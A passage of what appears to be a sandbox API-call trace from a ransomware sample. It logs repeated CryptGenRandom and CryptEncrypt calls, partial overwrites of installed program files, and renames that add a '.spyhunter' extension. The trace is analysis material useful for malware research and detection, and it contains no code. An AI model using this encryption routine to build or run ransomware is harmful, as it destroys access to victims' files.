pbData=0x31f110*, pdwDataLen=0x57f830*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f830*=0x30) returned 1 [0122.589] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\wab32.dll" (normalized: "c:\\program files (x86)\\common files\\system\\wab32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.590] GetProcessHeap () returned 0x2c0000 [0122.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.590] GetProcessHeap () returned 0x2c0000 [0122.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f400 | out: hHeap=0x2c0000) returned 1 [0122.591] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f830 | out: pbBuffer=0x57f830) returned 1 [0122.591] GetProcessHeap () returned 0x2c0000 [0122.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.591] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f828*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f828*=0x30) returned 1 [0122.591] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\xmlrwbin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0122.591] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll") returned 66 [0122.591] StrStrW (lpFirst="xmlrwbin.dll", lpSrch=".txt") returned 0x0 [0122.591] GetProcessHeap () returned 0x2c0000 [0122.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0122.591] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f7ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f7ec*=0x2800, lpOverlapped=0x0) returned 1 [0122.873] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0122.873] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f7ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f7ec*=0x2800, lpOverlapped=0x0) returned 1 [0122.873] GetProcessHeap () returned 0x2c0000 [0122.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0122.873] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.874] WriteFile (in: hFile=0x16c, lpBuffer=0x57f82c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f7ec, lpOverlapped=0x0 | out: lpBuffer=0x57f82c*, lpNumberOfBytesWritten=0x57f7ec*=0x4, lpOverlapped=0x0) returned 1 [0122.963] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f7ec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f7ec*=0x30, lpOverlapped=0x0) returned 1 [0122.963] CloseHandle (hObject=0x16c) returned 1 [0122.963] GetProcessHeap () returned 0x2c0000 [0122.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0122.964] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll.spyhunter") returned 76 [0122.964] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\xmlrwbin.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrwbin.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\xmlrwbin.dll.spyhunter")) returned 1 [0122.965] GetProcessHeap () returned 0x2c0000 [0122.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0122.965] GetProcessHeap () returned 0x2c0000 [0122.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0122.965] GetProcessHeap () returned 0x2c0000 [0122.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e045e8 | out: hHeap=0x2c0000) returned 1 [0122.965] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f830 | out: pbBuffer=0x57f830) returned 1 [0122.965] GetProcessHeap () returned 0x2c0000 [0122.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0122.965] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f828*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f828*=0x30) returned 1 [0122.965] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\libegl.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\libegl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0122.966] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\libegl.dll") returned 77 [0122.966] StrStrW (lpFirst="libegl.dll", lpSrch=".txt") returned 0x0 [0122.966] GetProcessHeap () returned 0x2c0000 [0122.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0122.966] ReadFile (in: hFile=0x16c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f7ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f7ec*=0x2800, lpOverlapped=0x0) returned 1 [0122.996] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0122.996] WriteFile (in: hFile=0x16c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f7ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f7ec*=0x2800, lpOverlapped=0x0) returned 1 [0122.996] GetProcessHeap () returned 0x2c0000 [0122.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0122.996] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.996] WriteFile (in: hFile=0x16c, lpBuffer=0x57f82c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f7ec, lpOverlapped=0x0 | out: lpBuffer=0x57f82c*, lpNumberOfBytesWritten=0x57f7ec*=0x4, lpOverlapped=0x0) returned 1 [0123.071] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f7ec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f7ec*=0x30, lpOverlapped=0x0) returned 1 [0123.071] CloseHandle (hObject=0x16c) returned 1 [0123.098] GetProcessHeap () returned 0x2c0000 [0123.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0123.098] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\libegl.dll.spyhunter") returned 87 [0123.098] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\libegl.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\libegl.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\libegl.dll.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\libegl.dll.spyhunter")) returned 1 [0123.099] GetProcessHeap () returned 0x2c0000 [0123.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0123.099] GetProcessHeap () returned 0x2c0000 [0123.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0123.100] GetProcessHeap () returned 0x2c0000 [0123.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eea558 | out: hHeap=0x2c0000) returned 1 [0123.100] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f828 | out: pbBuffer=0x57f828) returned 1 [0123.100] GetProcessHeap () returned 0x2c0000 [0123.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0123.100] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f820*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f820*=0x30) returned 1 [0123.100] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\resources.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\resources.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0123.101] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\resources.pak") returned 80 [0123.101] StrStrW (lpFirst="resources.pak", lpSrch=".txt") returned 0x0 [0123.101] GetProcessHeap () returned 0x2c0000 [0123.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0123.101] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f7e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0123.323] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.323] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f7e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0123.323] GetProcessHeap () returned 0x2c0000 [0123.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0123.323] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.323] WriteFile (in: hFile=0x170, lpBuffer=0x57f824*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f7e4, lpOverlapped=0x0 | out: lpBuffer=0x57f824*, lpNumberOfBytesWritten=0x57f7e4*=0x4, lpOverlapped=0x0) returned 1 [0123.403] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f7e4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f7e4*=0x30, lpOverlapped=0x0) returned 1 [0123.403] CloseHandle (hObject=0x170) returned 1 [0123.403] GetProcessHeap () returned 0x2c0000 [0123.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0123.403] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\resources.pak.spyhunter") returned 90 [0123.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\resources.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\resources.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\resources.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\resources.pak.spyhunter")) returned 1 [0123.404] GetProcessHeap () returned 0x2c0000 [0123.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0123.404] GetProcessHeap () returned 0x2c0000 [0123.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0123.404] GetProcessHeap () returned 0x2c0000 [0123.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ece830 | out: hHeap=0x2c0000) returned 1 [0123.404] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f828 | out: pbBuffer=0x57f828) returned 1 [0123.405] GetProcessHeap () returned 0x2c0000 [0123.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0123.405] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f820*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f820*=0x30) returned 1 [0123.405] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\chrome.visualelementsmanifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0123.405] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml") returned 86 [0123.405] StrStrW (lpFirst="chrome.VisualElementsManifest.xml", lpSrch=".txt") returned 0x0 [0123.405] GetProcessHeap () returned 0x2c0000 [0123.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0123.406] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f7e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f7e4*=0x19a, lpOverlapped=0x0) returned 1 [0123.407] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffe66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.407] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x19a, lpNumberOfBytesWritten=0x57f7e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f7e4*=0x19a, lpOverlapped=0x0) returned 1 [0123.407] GetProcessHeap () returned 0x2c0000 [0123.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0123.407] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.407] WriteFile (in: hFile=0x170, lpBuffer=0x57f824*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f7e4, lpOverlapped=0x0 | out: lpBuffer=0x57f824*, lpNumberOfBytesWritten=0x57f7e4*=0x4, lpOverlapped=0x0) returned 1 [0123.407] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f7e4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f7e4*=0x30, lpOverlapped=0x0) returned 1 [0123.407] CloseHandle (hObject=0x170) returned 1 [0123.407] GetProcessHeap () returned 0x2c0000 [0123.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0123.407] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml.spyhunter") returned 96 [0123.408] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\chrome.visualelementsmanifest.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.VisualElementsManifest.xml.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\chrome.visualelementsmanifest.xml.spyhunter")) returned 1 [0123.408] GetProcessHeap () returned 0x2c0000 [0123.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0123.408] GetProcessHeap () returned 0x2c0000 [0123.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0123.408] GetProcessHeap () returned 0x2c0000 [0123.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec9fd0 | out: hHeap=0x2c0000) returned 1 [0123.409] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f820 | out: pbBuffer=0x57f820) returned 1 [0123.409] GetProcessHeap () returned 0x2c0000 [0123.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0123.409] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f818*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f818*=0x30) returned 1 [0123.409] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\chrome.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0123.410] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe") returned 63 [0123.410] StrStrW (lpFirst="chrome.exe", lpSrch=".txt") returned 0x0 [0123.410] GetProcessHeap () returned 0x2c0000 [0123.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0123.410] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f7dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f7dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.470] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.470] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f7dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f7dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.470] GetProcessHeap () returned 0x2c0000 [0123.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0123.471] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.471] WriteFile (in: hFile=0x170, lpBuffer=0x57f81c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f7dc, lpOverlapped=0x0 | out: lpBuffer=0x57f81c*, lpNumberOfBytesWritten=0x57f7dc*=0x4, lpOverlapped=0x0) returned 1 [0123.743] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f7dc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f7dc*=0x30, lpOverlapped=0x0) returned 1 [0123.744] CloseHandle (hObject=0x170) returned 1 [0123.837] GetProcessHeap () returned 0x2c0000 [0123.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0123.837] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe.spyhunter") returned 73 [0123.838] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\chrome.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\chrome.exe.spyhunter")) returned 1 [0123.838] GetProcessHeap () returned 0x2c0000 [0123.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0123.839] GetProcessHeap () returned 0x2c0000 [0123.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0123.839] GetProcessHeap () returned 0x2c0000 [0123.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf880 | out: hHeap=0x2c0000) returned 1 [0123.839] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f820 | out: pbBuffer=0x57f820) returned 1 [0123.839] GetProcessHeap () returned 0x2c0000 [0123.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0123.839] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f818*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f818*=0x30) returned 1 [0123.839] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\verify.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\verify.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0123.839] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\verify.dll") returned 51 [0123.840] StrStrW (lpFirst="verify.dll", lpSrch=".txt") returned 0x0 [0123.840] GetProcessHeap () returned 0x2c0000 [0123.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0123.840] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f7dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f7dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.942] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.942] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f7dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f7dc*=0x2800, lpOverlapped=0x0) returned 1 [0124.280] GetProcessHeap () returned 0x2c0000 [0124.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0124.280] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.280] WriteFile (in: hFile=0x170, lpBuffer=0x57f81c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f7dc, lpOverlapped=0x0 | out: lpBuffer=0x57f81c*, lpNumberOfBytesWritten=0x57f7dc*=0x4, lpOverlapped=0x0) returned 1 [0124.327] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f7dc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f7dc*=0x30, lpOverlapped=0x0) returned 1 [0124.327] CloseHandle (hObject=0x170) returned 1 [0124.327] GetProcessHeap () returned 0x2c0000 [0124.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0124.328] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\verify.dll.spyhunter") returned 61 [0124.328] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\verify.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\verify.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\verify.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\verify.dll.spyhunter")) returned 1 [0124.717] GetProcessHeap () returned 0x2c0000 [0124.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0124.717] GetProcessHeap () returned 0x2c0000 [0124.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0124.717] GetProcessHeap () returned 0x2c0000 [0124.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21db0 | out: hHeap=0x2c0000) returned 1 [0124.717] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f818 | out: pbBuffer=0x57f818) returned 1 [0124.717] GetProcessHeap () returned 0x2c0000 [0124.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0124.717] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f810*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f810*=0x30) returned 1 [0124.718] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\javaws.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0124.739] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\javaws.jar") returned 51 [0124.739] StrStrW (lpFirst="javaws.jar", lpSrch=".txt") returned 0x0 [0124.739] GetProcessHeap () returned 0x2c0000 [0124.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0124.740] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, 